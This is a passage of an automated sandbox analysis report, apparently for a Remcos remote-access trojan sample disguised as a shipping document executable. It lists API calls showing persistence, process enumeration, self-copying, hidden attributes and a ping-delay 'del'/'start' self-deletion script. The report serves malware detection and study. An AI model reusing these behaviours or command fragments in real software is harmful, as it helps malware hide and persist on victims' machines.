                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60( (32 bit),?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004075FC
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000002E,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407622
                                          • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00410CC4,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407645
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407787
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407799
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004077B4
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004108CC), ref: 004077BD
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004077D7
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001E,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004077ED
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407805
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040781D
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000030,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040782F
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407841
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407865
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407875
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407666
                                            • Part of subcall function 00408E4E: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,00000000,80000001,?,00405FB0,80000001,00000000), ref: 00408E64
                                            • Part of subcall function 00408E4E: RegQueryValueExA.ADVAPI32(00000000,80000001,00000000,00000000,00000000,00000000,004157E8,?,00405FB0,80000001,00000000), ref: 00408E79
                                            • Part of subcall function 00408E4E: RegCloseKey.ADVAPI32(00000000,?,00405FB0,80000001,00000000), ref: 00408E84
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000027,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040768E
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000B,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004076A9
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004076B5
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004076C6
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000005,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004076E2
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000006,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004076FE
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000007,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040771A
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000008,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407736
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407752
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407768
                                          • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004108CC), ref: 00407893
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040789B
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004108CC), ref: 004078A6
                                            • Part of subcall function 00402A78: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AA3
                                            • Part of subcall function 00402A78: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AAC
                                            • Part of subcall function 00402A78: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AB6
                                            • Part of subcall function 00402A78: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AC1
                                            • Part of subcall function 00402A78: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AD2
                                            • Part of subcall function 00402A78: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,?), ref: 00402AF7
                                            • Part of subcall function 00402A78: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00410668,00410668,00000000), ref: 00402B24
                                            • Part of subcall function 00402A78: ShellExecuteA.SHELL32(00000000,open,00000000), ref: 00402B31
                                            • Part of subcall function 00402A78: exit.MSVCRT ref: 00402B3D
                                            • Part of subcall function 00402A78: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B46
                                            • Part of subcall function 00402A78: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B4F
                                          • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004108CC), ref: 004078D3
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004078DC
                                          • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004078E8
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,00000000,00000001), ref: 004078FD
                                            • Part of subcall function 004090D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00415940), ref: 0040910B
                                            • Part of subcall function 004090D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409127
                                            • Part of subcall function 0040FC2C: free.MSVCRT(?,00401C53,?,?,00401C39,00000000,?,00401BE7,?,?,00401B82,?,00000000,?,?,00401B4A), ref: 0040FC30
                                          • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000000D,00410844), ref: 0040792A
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00407945
                                            • Part of subcall function 00407E0B: GetModuleFileNameA.KERNEL32(00000000,?,00000104,004157D0,00000000,00415940), ref: 00407E25
                                            • Part of subcall function 00407E0B: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410560), ref: 00407E3A
                                            • Part of subcall function 00407E0B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00407E53
                                            • Part of subcall function 00407E0B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00407E5D
                                            • Part of subcall function 00407E0B: Process32First.KERNEL32(?,?), ref: 00407E79
                                            • Part of subcall function 00407E0B: Process32Next.KERNEL32 ref: 00407E88
                                            • Part of subcall function 00407E0B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000128), ref: 00407EA8
                                            • Part of subcall function 00407E0B: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60 ref: 00407EB7
                                            • Part of subcall function 00407E0B: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000), ref: 00407EC1
                                            • Part of subcall function 00407E0B: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000), ref: 00407ECB
                                            • Part of subcall function 00407E0B: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00407EDF
                                            • Part of subcall function 00407E0B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407EEF
                                            • Part of subcall function 00407E0B: Process32Next.KERNEL32 ref: 00407EFF
                                            • Part of subcall function 00407E0B: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407F1B
                                            • Part of subcall function 00407E0B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407F24
                                            • Part of subcall function 00407E0B: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,?), ref: 00407F35
                                            • Part of subcall function 00407E0B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407F40
                                            • Part of subcall function 00407E0B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407F49
                                            • Part of subcall function 00407E0B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408143
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000028,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407969
                                          • atoi.MSVCRT ref: 00407970
                                          • CreateThread.KERNEL32 ref: 0040799F
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000F,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004079AC
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004079C0
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000031,00410668,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004079D5
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000011,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004079EC
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004079FE
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407A17
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000031,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407A30
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407A42
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407A5D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004108CC), ref: 00407A66
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00407A72
                                          • CreateDirectoryA.KERNEL32(00000000), ref: 00407A79
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00415720,004108CC,00000000,00000011), ref: 00407A97
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,00000011), ref: 00407AA4
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,00000000,00000011), ref: 00407AB0
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00407AB9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00407AC2
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407AE0
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407AFB
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000014,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407B16
                                          • CreateThread.KERNEL32 ref: 00407B2B
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000016,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407B38
                                          • CreateThread.KERNEL32 ref: 00407B4E
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000023,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407B5B
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000026,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407B71
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000025,00000000,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407B83
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407B9E
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407BA7
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407C44
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$?data@?$basic_string@$??1?$basic_string@?c_str@?$basic_string@$V01@@$??0?$basic_string@V01@$??4?$basic_string@$AddressProcV?$basic_string@$CreateD@1@@D@2@@0@Module$Handle$?length@?$basic_string@Thread$??8std@@Hstd@@$?size@?$basic_string@LibraryLoadOpenProcess32$?begin@?$basic_string@?find@?$basic_string@CloseFileMutexNameNextProcessQueryV10@V12@Valuefreemalloc$??2@??9std@@?end@?$basic_string@?substr@?$basic_string@CurrentD@2@@0@0@DirectoryErrorExecuteFirstLastObjectShellSingleSnapshotToolhelp32V10@0@V10@@WaitWow64Y?$basic_string@atoiexit
                                          • String ID: (32 bit)$ (64 bit)$C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe$EXEpath$Inj$ProductName$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$origmsc
                                          • API String ID: 1140220109-2260984107
                                          • Opcode ID: eb0ac9cf140c71ba797a23109526bcb8e61986eda592d9f3486693d77c5661a1
                                          • Instruction ID: 9e524ab3c3c25e5b5afb6edb3c87aefde3ed2a315a96d5f46ca7337cbf0df8a9
                                          • Opcode Fuzzy Hash: eb0ac9cf140c71ba797a23109526bcb8e61986eda592d9f3486693d77c5661a1
                                          • Instruction Fuzzy Hash: 0C227370B05244ABDB0477B1AC5EAEE3B6A9B84305F0044BEF502FA2E1DEBC5D85875D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00415968,00000000,00415940), ref: 0040652E
                                          • CreateDirectoryA.KERNELBASE(00000000), ref: 00406535
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00415918,004108CC,?), ref: 0040654C
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?), ref: 00406559
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?), ref: 00406569
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 00406572
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00415968,00000000,00415940), ref: 00406597
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 004065A0
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?), ref: 004065A8
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004065E5
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040661D
                                          • CopyFileA.KERNEL32(C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,00000000), ref: 00406625
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(00000001,00000000,?,?,?,?,004108CC,?), ref: 00406668
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,004108CC,?), ref: 00406675
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,004108CC,?), ref: 00406680
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,004108CC,?), ref: 00406689
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,004108CC,?), ref: 00406692
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004066AE
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,004108CC,?), ref: 004066B7
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004066C1
                                          • CopyFileA.KERNEL32(C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,00000000), ref: 004066C9
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe), ref: 004066D6
                                            • Part of subcall function 0040712F: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040713F
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004066E8
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000007), ref: 0040671F
                                          • SetFileAttributesA.KERNELBASE(00000000), ref: 0040672C
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000007), ref: 00406744
                                          • SetFileAttributesA.KERNELBASE(00000000), ref: 0040674B
                                          • getenv.MSVCRT ref: 0040675B
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 00406766
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406771
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040677D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406786
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040678F
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040679C
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(00000000), ref: 004067A9
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,PING 127.0.0.1 -n 2 ), ref: 004067C1
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,?,00410860,00410EC8), ref: 004067E7
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(del ,?,00410860,00000000), ref: 004067FB
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406806
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00406813
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(00000001,00000000), ref: 00406820
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040682D
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000), ref: 0040683A
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406845
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040684E
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406857
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406860
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406869
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406872
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410860,?,00410EC8), ref: 00406881
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(start "" ,?,00410860,004157D0,00000000), ref: 0040689A
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 004068A5
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004068B2
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004068BF
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 004068CC
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000), ref: 004068D9
